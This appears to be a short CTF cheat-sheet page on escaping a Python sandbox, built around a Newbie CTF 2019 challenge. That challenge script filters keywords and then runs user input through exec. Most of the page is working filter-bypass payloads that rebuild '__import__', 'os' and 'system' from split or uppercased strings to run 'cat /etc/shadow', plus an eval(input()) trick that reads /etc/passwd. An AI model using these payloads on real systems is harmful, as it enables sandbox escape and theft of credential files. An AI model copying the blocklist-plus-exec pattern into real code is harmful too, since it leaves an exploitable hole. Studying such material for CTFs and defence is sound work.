Python Jails Escape
Last modified: 2023-03-26
If we faced the Python script as follow, we cannot use common modules used for escalating privileges ("os", "system", etc.).
It appeared in Newbie CTF 2019.
#! /usr/bin/python3
def main():
text = input('>> ')
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
if keyword in text:
print("No!!!")
return
else:
exec(text)
if __name__ == "__main__":
main()
We need to modify module names to allow us to execute them.
This post explains in details.
Payloads
print(globals())
print(getattr(getattr(globals()['__builtins__'], '__im'+'port__')('o'+'s'), 'sys'+'tem')('cat /etc/shadow'))
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /etc/shadow')
Payloads (input)
If the "eval" or "exec" modules are accepted, we can input arbitrary code.
eval(input())
# or
exec(input())
> print(open("/etc/passwd", "r").read())